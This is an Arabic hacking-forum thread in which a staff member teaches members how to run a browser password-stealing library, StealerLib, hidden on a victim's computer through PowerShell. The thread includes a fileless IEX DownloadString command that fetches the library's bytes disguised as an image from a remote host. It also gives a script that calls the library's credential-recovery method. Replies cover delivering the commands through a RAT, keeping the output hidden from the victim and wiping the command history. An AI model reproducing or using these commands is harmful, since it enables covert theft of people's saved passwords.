تشغيل مكتبة ستيلر ليب عن بعد من خلال الباور شيل

• الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,570
2,966
1
حياكم الله ..
شفت رد الاخ هنا
DBStealer| سحب الباس وردات وارسالها للداتا بيس وقراءتها من خلال اداة .

هل ممكن عمل متل هده الادات لكن بالبور شل يعني ملف بور شل يجلب المعلومات
الفائدة اللي يريدها اعتقد انه يريد يشغل باور شيل بخفاء بجهاز المستخدم ويحصل على الاوت بوت ..
يعني مستخدم عنده جاهز ويريد يشغل المكتبة ..
هنا الحل ..
اول واسهل حل والافضل ..حمل الصورة من الرابط هنا

ارفعها على اي رابط مباشر او اي موقع لرفع الصور مايقوم بتحويلها او التعديل عليها ..
محتوى الملف هنا

لعرض المحتوى , تحتاج إلى تسجيل الدخول أو إنشاء حساب.

بالملف موجود بايتات المكتبة كاملة ولكن وضعت هنا فقط 77,90,144,0
المهم بعد ماتحمل الصورة نفذ بالجهاز الهدف الامر التالي

كود:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.101/img.jpg');
استبدل الرابط اللي بالكود برابط الصورة اللي وضعت رابطها يعني حمل الصورة ومن ثم ارفعها مرة ثانية ..
هذا كل شيء ..

الطريقة الثانية لو المكتبة لها مسار بجهاز المستخدم يعني مابدك الامور تتم عن بعد مثل الطريقة الاولى ..

قم بكتابة الكود التالي مع مراعاة مسار المكتبة اللي ارفقتها بالملف "يعني المكتبة لازمة فقط في الطريقة الثانية"

كود:
$Path      = "D:\StealerLib.dll"
$Namespace = "StealerLib.Browsers"
$ClassName = "CaptureBrowsers"
$Method    = "RecoverCredential"
$Arguments = $null
Add-Type -Path $Path
$Full_Class_Name = "$Namespace.$ClassName"
$Type            = [type] $Full_Class_Name
$MethodInfo = $Type.GetMethod($Method)
$MethodInfo.Invoke($null, $Arguments)
للتحميل من هنا

هنا فديو على السريع ..بريء امام الله عز وجل من اي استخدام في معصية .

التعديل الأخير:

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,570
2,966
1
اين تدخل النتائج اخي بشار
مافهمت سؤالك للاسف اخي الحبيب ..
التائج تظهر لك بواجههة الباور شيل اللي مشغلها بشكل مخفي بجهاز المستخدم عن طريق المتحكم الخاص بك ..
بس يطلعو بتنسخهم ..او بامكانك جعل الناتج في ملف text يتم كتابته ..بس الافضل انك تاخذهم مباشرة من الاوت بوت الخاص بالباور شيل عند تنفيذ الامر المذكور سابقا

Frsibm

:: عضو جديد ::
29 يناير 2019
23
28
0
مثلا اخي بشار انا اخترقتك في رات معين ثم شغلت امر مكتبة Stealer عندك بالباور شل وهي مخفية عندك كيف استطيع الحصول على الباسووردات يعني ان ظهرت لي ستظهر له ايضا

• أعجبني
التفاعلات: BasharBachir

Frsibm

29 يناير 2019
23
28
0
يعني احول المكتبة الى بايتات بعدها اضعها في كود الباور شل واحفضها كصورة ثم نرسل للضحية امر التشفيل بالباورشل

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,570
2,966
1
مثلا اخي بشار انا اخترقتك في رات معين ثم شغلت امر مكتبة Stealer عندك بالباور شل وهي مخفية عندك كيف استطيع الحصول على الباسووردات يعني ان ظهرت لي ستظهر له ايضا
لا لن تظهر له ابدا ..لان الباور شيل شغالة عنده بالخفاء
وعشان لو حب يشوف اخر الاوامر اللي تمت كتابتها ابحث بجوجل في امر لحذف السجل الخاص بالاوامر المطبقة بالباور شيل
يعني احول المكتبة الى بايتات بعدها اضعها في كود الباور شل واحفضها كصورة ثم نرسل للضحية امر التشفيل بالباورشل
لاتحول شي اخي الحبيب بالصورة اللي ارفقت لكم رابطها موجود البايتات كاملة فقط ضع الرابط المباشر الجديد للصورة بعد ان تقوم بتحميلها ورفعها وقم بتنفيذ الامر

Frsibm

29 يناير 2019
23
28
0
لا اعلم اخي انا لم افهم طريقة العمل اساسا طبقت السكريبت بالباور شل عن طريق الريفنج رات لم يظهر شيئ لا لي ولا للضحية

• أعجبني

annaba23

20 نوفمبر 2018
18
28
annaba
0
جربت هده الطريقة الاولى والتانية مع وندوز 7 ما اشتغلت كلا الطريقتين تعطي خطأ الطريقة التانية هدا هو الخطا ليظهر رغم وجود الملف دلل في القرص إلا انها تقول غير موجود هل حد تاني جرب ونجحت

• أعجبني

Absolute Zero

مشارك
13 أغسطس 2019
18
31
0
شكرا لك اخي بشار كنت اواجه مشكلة في تحويل هذه المكتبة لبلوقن في الرات الخاص بي و طريقتك الهمتني لحل بدون تحويل الكلاينت ل framwork v 4 :210::244:

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,570
2,966
1
جربت هده الطريقة الاولى والتانية مع وندوز 7 ما اشتغلت كلا الطريقتين تعطي خطأ الطريقة التانية هدا هو الخطا ليظهر رغم وجود الملف دلل في القرص إلا انها تقول غير موجود هل حد تاني جرب ونجحت
اهلا بك اخي الحبيب ..يلزم توافر فريم وورك 4.5 في الجهاز "مش بايدي" المكتبة الجاهزة StealerLib تستخدم مكتبة SQL والي بدورها موجودة في الفريم ورك 4.5
تاكد من ان الفريم وورك ذا متواجد ورح تشتغل اكيد .

annaba23

20 نوفمبر 2018
18
28
annaba
0
ممكن ارفاق سورس كود المكتبة المحولة اخي بشار انا لا املك طريقة لتحويلها لاني ليس لدي جهاز يشغل المكتبة الأصلية شكرا على كل حال دروسك ما شاء الله نحن تنعلم منك كل يوم كدلك كنت اود ان أسألك عن موضوع اعجبني موجود في الديف بونت وهو رات مبرمج للعمل بالبور شال يعني الكلانيت فزوال بزيك والسرفر بور شل هل يمكن ان يكون السرفر مستقر ام ان الطريقة غير فعالة حسب رأيك لان جربت لكن السرفر لا يعمل بطريقة جيدة لا اعلم المشكل اين هل التتبيت ام التبليغ بطيئ المهم لو تفتح موضوع للنقاش وعمل رات بهده المواصفات راح يكون شيئ جديد كليا يعني ممكن تنفيد اوامر الشل مباشرة

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,570
2,966
1
ممكن ارفاق سورس كود المكتبة المحولة اخي بشار انا لا املك طريقة لتحويلها لاني ليس لدي جهاز يشغل المكتبة الأصلية شكرا على كل حال دروسك ما شاء الله نحن تنعلم منك كل يوم كدلك كنت اود ان أسألك عن موضوع اعجبني موجود في الديف بونت وهو رات مبرمج للعمل بالبور شال يعني الكلانيت فزوال بزيك والسرفر بور شل هل يمكن ان يكون السرفر مستقر ام ان الطريقة غير فعالة حسب رأيك لان جربت لكن السرفر لا يعمل بطريقة جيدة لا اعلم المشكل اين هل التتبيت ام التبليغ بطيئ المهم لو تفتح موضوع للنقاش وعمل رات بهده المواصفات راح يكون شيئ جديد كليا يعني ممكن تنفيد اوامر الشل مباشرة
مافهمت سالفة "تحويلها" تقصد جعلها تعمل على 2.0 فريم وورك ؟

هنا موضوع قمت بذلك اخي

مكتبة StealerLib تعمل على فريم ورك 2.0

عشان السورس فقط اسحب المكتبة على Dnspy بيطلع السورس معاك
لو صار مشكلة خبرني

إخلاء مسؤلية

• المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك